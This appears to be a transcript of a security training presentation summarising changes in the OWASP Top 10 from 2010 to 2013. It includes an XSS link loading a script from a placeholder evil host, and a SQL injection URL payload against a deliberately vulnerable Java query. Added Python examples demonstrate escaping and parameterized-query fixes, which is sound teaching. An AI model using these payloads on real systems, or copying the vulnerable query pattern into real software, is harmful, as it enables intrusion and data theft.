OWASP from 2010 to 2013

by Phil Patrick, on 25 July 2016


Transcript of OWASP from 2010 to 2013

OWASP Top 10 - 2013 (RC1): what changed from 2010?

  • A1 - Injection. 2010: A1 (-), unchanged.
  • A2 - Broken Authentication / Session Management. 2010: A3 (+1). Swapped positions in severity with XSS.
  • A3 - Cross-Site Scripting (XSS). 2010: A2 (-1). Swapped positions in severity with Broken Authentication / Session Management.
  • A4 - Insecure Direct Object Reference (IDOR). 2010: A4 (-), unchanged.
  • A5 - Security Misconfiguration. 2010: A6 (+1). Moved up one spot (A6 to A5).
  • A6 - Sensitive Data Exposure. New category, merged from the 2010 entries A7: Insecure Cryptographic Storage & A9: Insufficient Transport Layer Protection.
  • A7 - Missing Function Level Access Control. 2010: A8, which used to be called "Failure to Restrict URL Access".
  • A8 - Cross-Site Request Forgery (CSRF). 2010: A5 (-3). Dropped 3 spots from 2010.
  • A9 - Using Known Vulnerable Components. New category; originally was included within A5: Security Misconfiguration.
  • A10 - Unvalidated Redirects and Forwards. 2010: A10 (-), unchanged.
What is the OWASP!?
First came online in 2001 and has grown since then.
A standard for measuring the security of web applications.
Anyone can contribute.
Hundreds of open source projects.
Free application security tutorials, for developers & even you, QA!
Examples:
  • My Firefox collection: http://bit.ly/X6bwd3
  • OWASP App Sec Tutorial Series: http://bit.ly/ZEsnT2
  • If you are really curious, check out the testing guide: http://bit.ly/ZEvASk

Top 2 most common vulnerabilities we've seen/worked so far:
A1: Injection
A3: Cross-Site Scripting (XSS)

Implications of code vulnerable to XSS?
  • remote attacks;
  • redirects to attacker-controlled sites hosting malicious files, e.g. a link such as:
    <A HREF="http://phils-trusted-site.org/<SCRIPT SRC='http://phils-evil-site.org/swetha-is-evil.js'></SCRIPT>"> Go to phils-trusted-site.org</A>
  • identity theft (loss of confidentiality)
  • system compromise
  • ...and many MORE! (unfortunately)

Any questions!?
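The link on the slide above carries a script tag inside an href; the usual fix on the server side is to validate the URL before it is emitted and to HTML-encode whatever goes into the attribute value and the link text, so the browser sees markup characters as data rather than as tags. The following is an added example in Python, not code from the presentation (the slide only shows HTML); the helper names render_link, is_safe_url and escape_attr, the allowed-scheme list and the sample hrefs are assumptions made for the demonstration.

```python
import html
from urllib.parse import urlsplit

# Constructed sample inputs for the demonstration: the tainted href is the
# one from the slide's XSS example, the trusted one is a plain link.
TRUSTED_HREF = "http://phils-trusted-site.org/"
TAINTED_HREF = ("http://phils-trusted-site.org/"
                "<SCRIPT SRC='http://phils-evil-site.org/swetha-is-evil.js'></SCRIPT>")

# Assumed policy: only absolute http(s) links are rendered as anchors.
ALLOWED_SCHEMES = {"http", "https"}


def is_safe_url(url: str) -> bool:
    """Accept only absolute http(s) URLs that contain no HTML markup
    characters; javascript: and data: URLs fail the scheme check."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return False
    return not any(ch in url for ch in "<>\"'")


def escape_attr(value: str) -> str:
    """Output encoding for an attribute value: <, >, &, " and ' become
    entities, so an injected <SCRIPT> tag is rendered as literal text."""
    return html.escape(value, quote=True)


def render_link(href: str, text: str) -> str:
    """Render an <a> tag with both the href and the text encoded.
    If the URL fails validation, only the escaped text is emitted."""
    safe_text = html.escape(text, quote=True)
    if not is_safe_url(href):
        return safe_text
    return '<a href="%s">%s</a>' % (escape_attr(href), safe_text)


if __name__ == "__main__":
    print(render_link(TRUSTED_HREF, "Go to phils-trusted-site.org"))
    print(render_link(TAINTED_HREF, "Go to phils-trusted-site.org"))
    print(escape_attr(TAINTED_HREF))
```

The two defences are independent: escape_attr alone already turns the tainted href into inert text, and is_safe_url additionally refuses to emit a link whose URL contains markup or a non-http(s) scheme.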
Annual training complete!
Who am I?
My handouts show my general methodologies and approaches.

A1 - Injection, example from the slides (vulnerable code):
String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";
In the URL -> id=' or '1'='1
http://phils-awesome-app.com/app/accountView?id=' or '1'='1
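The Java on the slide pastes request.getParameter("id") straight into the SQL text, which is why a value of ' or '1'='1 turns the WHERE clause into one that matches every account. The following is an added example, not the presentation's code: it rebuilds that query in Python over an in-memory SQLite table with constructed rows, extracts the id parameter from the slide's URL, and shows the parameterized form that binds the value as data. The table contents, the function names and the use of SQLite are assumptions made for the demonstration.

```python
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed sample data; not the application from the slides.
ROWS = [("alice", 100), ("bob", 250), ("carol", 75)]

# The URL shown on the slide, with the injection payload in the id parameter.
SLIDE_URL = "http://phils-awesome-app.com/app/accountView?id=' or '1'='1"


def make_db() -> sqlite3.Connection:
    """Create an in-memory accounts table holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (custID TEXT, balance INTEGER)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)", ROWS)
    return conn


def id_from_url(url: str) -> str:
    """Pull the id query parameter out of a request URL, as the app would."""
    return parse_qs(urlsplit(url).query)["id"][0]


def lookup_vulnerable(conn: sqlite3.Connection, cust_id: str) -> list:
    """Same shape as the Java on the slide: the parameter is concatenated
    into the SQL text, so quotes inside it change the query's meaning."""
    query = "SELECT * FROM accounts WHERE custID='" + cust_id + "'"
    return conn.execute(query).fetchall()


def lookup_safe(conn: sqlite3.Connection, cust_id: str) -> list:
    """Parameterized query: the driver binds the value, it is never parsed
    as SQL, so the payload is compared literally and matches nothing."""
    query = "SELECT * FROM accounts WHERE custID=?"
    return conn.execute(query, (cust_id,)).fetchall()


def demo() -> dict:
    """Row counts for a normal id and for the slide's payload, both ways."""
    conn = make_db()
    payload = id_from_url(SLIDE_URL)
    return {
        "vulnerable_normal": len(lookup_vulnerable(conn, "bob")),
        "vulnerable_payload": len(lookup_vulnerable(conn, payload)),
        "safe_normal": len(lookup_safe(conn, "bob")),
        "safe_payload": len(lookup_safe(conn, payload)),
    }


if __name__ == "__main__":
    for name, count in demo().items():
        print(name, count)
```

With the concatenated query the payload returns all three constructed rows, while the parameterized query returns none for the payload and still returns the one matching row for a legitimate id; the fix is in the call shape, not in filtering the input.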